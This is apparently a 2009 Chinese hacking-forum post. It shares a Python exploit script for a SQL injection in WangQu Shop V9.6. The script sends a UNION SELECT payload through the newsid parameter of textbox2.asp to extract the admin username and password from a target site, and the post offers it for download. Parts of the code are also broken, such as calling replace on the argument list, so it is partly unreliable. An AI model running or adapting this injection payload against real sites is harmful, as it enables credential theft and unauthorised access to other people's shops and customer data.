技术论坛 › 黑客攻防 › 网趣购物商城V9.6SQL注入利用程序

dirtysea 发表于 2009-12-22 11:55:50

网趣购物商城V9.6SQL注入利用程序

################################################################################
#               网趣购物商城V9.6SQL注入利程序
#            NaMe：WangQu Shop V9.6 SQL Injection Vulnerability
#            Author : shaun
#            Blog : www.dirtysea.com
#            Date : 20/12/2009
################################################################################

import sys
import os
import time
import http.client

if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)


if len(sys.argv) != 2:
    print("\n-----------------------------------------------------------------")
    print("| virusest@gmail.com                                              |")
    print("| 12/09    WangQU shop SQL Injection Tool                         |")
    print("| Help: 1.py -h                                                   |")
    print("| Visit www.virusest.com                                          |")
    print("|---------------------------------------------------------------|\n")
    sys.exit(1)

for arg in sys.argv:
    if arg == '-h':
      print("\n-------------------------------------------------------------")
      print("| virusest[@]gmailcom                                    |")
      print("| 12/09WangQU shop SQL Injection Tool                     |")
      print("| Usage: 1.py www.site.com newsid                           |")
      print("| Example: 1.py www.virusest.com 65                           |")
      print("| Visit www.virusest.com                                    |")
      print("|------------------------------------------------------------|\n")
      sys.exit(1)

site = sys.argv.replace("http://","").rsplit("/",1)
site = site.lower()


injecturl = '/textbox2.asp?action=modify&newsid=65%20and%201=2%20union%20select%201,2,admin%2Bpassword,4,5,6,7,8%20from%20cnhww'


print("\n--------------------------------------------------------------------------------")
print("|            virusest@gmail.com                                                |")
print("|            12/09WangQU shop SQL Injection Tool                           |")
print("|            Visit www.virusest.com                                          |")
print("\n[-] %s" % time.strftime("%X"))
print("[+] Target:",site)
print("[+] Cracking,wait.....")


try:
    conn = http.client.HTTPConnection(site)
      
    conn.request("Get",injecturl)
    response = conn.getresponse()
    page = response.read()
    response.close()
    print(page)

except(KeyboardInterrupt,SystemExit):
    raise
except:
    print("cancel")
    pass


Download Me
Developed under Phyton ver 3.1， Make sure you have installed it Before using。

查看完整版本: 网趣购物商城V9.6SQL注入利用程序